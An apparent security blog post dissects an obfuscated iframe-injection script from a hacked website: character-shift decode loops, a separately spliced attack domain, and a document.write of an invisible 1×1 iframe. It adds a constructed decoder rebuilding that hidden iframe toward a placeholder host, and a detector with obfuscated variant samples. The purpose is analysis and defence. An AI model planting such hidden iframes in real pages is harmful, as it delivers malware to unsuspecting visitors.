Below is a real iframe attack found on an exploited website.
It is rare that an attack will be found in such readable form. In fact, it is usually all put onto a single line; I simply broke it out into a more readable format. In some cases it is easy to find this code because it is by far the longest line in the page. Regardless, below is the simple flow of how this code works.
1. Initialize variables k1, k2, t1, t2, and h.
2. Deobfuscate k1 and k2, appending the results (and the attack domain) to h
3. Write h to the user
Resulting deobfuscated code (note that the frame is set to be virtually invisible: a 1×1 pixel iframe)
The while loops are relatively simple: they merely deobfuscate the k1 and k2 variables and append the deobfuscated output to the h string. To do this the attacker uses two built-in JavaScript methods, the static String.fromCharCode() function and the charCodeAt() method of the k1 (and k2) string.
String.fromCharCode() returns the character(s) corresponding to the character code(s) passed to it; for codes 0–255 these are the ISO-Latin-1 positions. E.g. String.fromCharCode(65) returns "A". (Note the lower-case f: JavaScript is case-sensitive, and String.FromCharCode is not defined.)
A reference sheet for ISO-Latin-1 characters and their numeric position can be viewed here.
In order to get the proper code to pass into String.fromCharCode(), the attack code first converts the current ISO-Latin-1 character into its corresponding numeric code. This is done with the string's charCodeAt() method. The while loops add a small amount of complication to this step by shifting the character code by -3 in one loop and -2 in the other before passing it to String.fromCharCode().
Adding To the String
In the attack code (between the while loops) there is a plain string concatenation that adds the domain of the actual attack. There is no way to tell that this is the domain until after the surrounding code is deobfuscated. The reason it is kept as a separate segment is that the attacker can quickly change the domain of the attack while preserving the rest of the attack code unchanged.
Putting it All Together
The attack code finishes by writing the assembled markup to the victim's page with the document.write() function. This is important to recognize because by the time the variable h reaches this call it is fully deobfuscated. Therefore, an analyst can simply replace this sink with a non-malicious one to see what the obfuscated code actually produces: for example, instead of document.write(h) use alert(h) or console.log(h), or assign h to a textarea's value (alert may truncate long strings; there is no document.alert()). Do this in an isolated VM or a standalone JavaScript engine, never in a browser that can reach the attacker's domain.
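As an added example (this is illustrative code written for this article, not the code from the compromised site), the following JavaScript reproduces the decode loops described above and swaps document.write() for a sink that only returns the rebuilt markup. The payload strings, the +3/+2 offsets, the iframe attributes and the placeholder domain are all constructed for the example; the only thing taken from the original is the shape of the loop.

```javascript
// Added example, not the attack code from the page: reproduces the
// charCodeAt()/String.fromCharCode() decode pattern with constructed input
// and replaces document.write() with a sink that just returns the markup.

// Decode a string whose character codes were shifted by `shift`:
// the loop subtracts the shift and rebuilds the character.
function decodeShifted(encoded, shift) {
  let out = "";
  let i = 0;
  while (i < encoded.length) {
    out += String.fromCharCode(encoded.charCodeAt(i) - shift);
    i++;
  }
  return out;
}

// Encoder used only to build the constructed sample below (the attacker's
// tooling would have done this offline; it is not part of the page).
function encodeShifted(plain, shift) {
  let out = "";
  for (let i = 0; i < plain.length; i++) {
    out += String.fromCharCode(plain.charCodeAt(i) + shift);
  }
  return out;
}

// Constructed sample: k1 is shifted by +3, k2 by +2, and the domain sits
// in the clear between them, the layout the article describes.
const k1 = encodeShifted('<iframe src="http://', 3);
const domain = "malicious.example"; // placeholder, not a real indicator
const k2 = encodeShifted('/in.php" width="1" height="1" style="visibility:hidden"></iframe>', 2);

// Rebuild h the way the attack script does: decode k1, append the domain,
// decode k2.
function rebuildMarkup(k1, domain, k2) {
  let h = "";
  h += decodeShifted(k1, 3);
  h += domain;
  h += decodeShifted(k2, 2);
  return h;
}

// Safe sink: the attacker's script calls document.write(h) here. For
// analysis we only record the string; in a browser you could instead use
// console.log(h) or put it in a textarea so nothing is rendered.
function safeSink(h) {
  return { rendered: false, markup: h };
}

const result = safeSink(rebuildMarkup(k1, domain, k2));
console.log(result.markup);
```

Run it with node and the decoded iframe tag is printed instead of being injected into a page. The same substitution works on the real sample: leave the loops untouched, replace only the final sink, and execute in an environment with no network access.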
Detecting/Defending Against These Attacks
Some anti-virus and anti-malware solutions flag and stop these attacks from affecting end-users. Unfortunately, however, research points to the fact that very few are actually capable of detecting these attacks. I rolled this attack up into an HTML file and submitted it to VirusTotal, where 41 anti-virus/anti-malware scanners assessed the file. Of those 41 scanners, only three detected that there was an issue.
Browser Protection Software:
- Trusteer Browser Protection Software
- Kace Browser Protection Software
- HP/Symantec/Mozilla Browser Sandboxing Software
- Various Virtual Browser Sandboxing Solutions
Content Filtering Technology
Content filtering technology could help in two ways. First, it could detect the issue on the page to begin with and proactively categorize the page to prevent the victim from accessing the attack code. Second, if the attack code is delivered to the victim, the content filtering system could still prevent the victim from reaching the malicious website hosting the exploit and malware.
Example Content Filtering System Software:
- BlueCoat WebFilter
- WebSense WebFilter
- ScanSafe WebFilter/Malware Scanner
- Many, many others
Intrusion Prevention Systems can be used to block the exploit from reaching the victim. Unfortunately, in many cases the prevention is based on the exploit rather than on the vulnerability. This means that the exploit can be altered to bypass the IPS fairly easily by changing the signature and/or behaviour of the attack. Of course, finely tuned and sophisticated IPSs have fewer issues with this.
- Sourcefire SNORT
- IBM Internet Security Systems Proventia
- McAfee Network Security Platform (formerly Intrushield IPS)
- TippingPoint Digital Vaccine
- Many, many others
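To make the exploit-based versus behaviour-based detection point concrete, here is an added example written for this article (not vendor code, and not the original attack). It scans inline script text with (a) a byte-exact signature taken from one constructed obfuscated sample and (b) a structural heuristic that looks for the decode-loop-plus-HTML-sink pattern, and it also implements the "longest line on the page" check mentioned at the top of the post. The two script variants, the benign script and the page fragments are all constructed; the obfuscated payload text is a placeholder, the domains use the reserved .invalid TLD, and the regexes are illustrative rather than production-ready.

```javascript
// Added example, not the page's own code: an exploit-specific string
// signature versus a structural heuristic, run over constructed inline
// script samples that mimic the attack's shape (payload text is a
// placeholder, not a real decodable payload; domains use .invalid).

// Variant A: the sample a signature would be written against.
const VARIANT_A =
  'var k1="Ziudph#vuf",k2="xtq",h="";var t1=0;' +
  'while(t1<k1.length){h+=String.fromCharCode(k1.charCodeAt(t1)-3);t1++;}' +
  'h+="attacker.invalid";var t2=0;' +
  'while(t2<k2.length){h+=String.fromCharCode(k2.charCodeAt(t2)-2);t2++;}' +
  'document.write(h);';

// Variant B: same technique after a trivial rewrite: renamed variables,
// shift changed to 5, document.write swapped for an innerHTML append.
const VARIANT_B =
  'var a="Ankfrj-xwh",b="";var i=0;' +
  'while(i<a.length){b+=String.fromCharCode(a.charCodeAt(i)-5);i++;}' +
  'b+="other.invalid";document.body.innerHTML+=b;';

// Benign script: a loop and a DOM write, but no shifted-character decode.
const BENIGN =
  'var total=0;for(var i=0;i<10;i++){total+=i;}' +
  'document.getElementById("sum").textContent=total;';

// (a) Exploit-specific signature: the exact decode statement from variant A.
const SIGNATURE = 'h+=String.fromCharCode(k1.charCodeAt(t1)-3)';

function matchesSignature(script) {
  return script.includes(SIGNATURE);
}

// (b) Structural heuristic: a while loop that rebuilds a string from shifted
// character codes, plus an HTML sink anywhere in the script. Identifier
// names and the shift amount are left free.
const DECODE_LOOP =
  /while\s*\([^)]*\)\s*\{[^}]*String\.fromCharCode\(\s*\w+\.charCodeAt\(\s*\w+\s*\)\s*[-+]\s*\d+\s*\)/;
const HTML_SINK = /document\.write\s*\(|\.innerHTML\s*\+?=|insertAdjacentHTML\s*\(/;

function matchesHeuristic(script) {
  return DECODE_LOOP.test(script) && HTML_SINK.test(script);
}

// "Longest line on the page" check from the top of the post: flag a page
// whose longest non-empty line is at least `ratio` times the median length.
function hasOutlierLine(pageText, ratio = 4) {
  const lengths = pageText.split("\n").map(l => l.length).filter(n => n > 0);
  if (lengths.length < 2) return false;
  const sorted = [...lengths].sort((a, b) => a - b);
  const median = sorted[Math.floor(sorted.length / 2)];
  return sorted[sorted.length - 1] >= ratio * median;
}

// Constructed page fragments for the line-length check.
const CLEAN_PAGE = "<html>\n<body>\n<p>Hello world</p>\n</body>\n</html>\n";
const INFECTED_PAGE =
  "<html>\n<body>\n<p>Hello world</p>\n<script>" + VARIANT_A + "</script>\n</body>\n</html>\n";

function scan(script) {
  return { signature: matchesSignature(script), heuristic: matchesHeuristic(script) };
}

for (const [name, s] of [["variant A", VARIANT_A], ["variant B", VARIANT_B], ["benign", BENIGN]]) {
  console.log(name, scan(s));
}
console.log("clean page outlier:", hasOutlierLine(CLEAN_PAGE));
console.log("infected page outlier:", hasOutlierLine(INFECTED_PAGE));
```

Variant A trips both checks, variant B only the heuristic, and the benign script neither: that is the gap between matching the exploit and matching the behaviour. A real attacker has more options than renaming and reshifting (string splitting, eval, different sinks), so even the heuristic is a starting point, not a rule to deploy as-is.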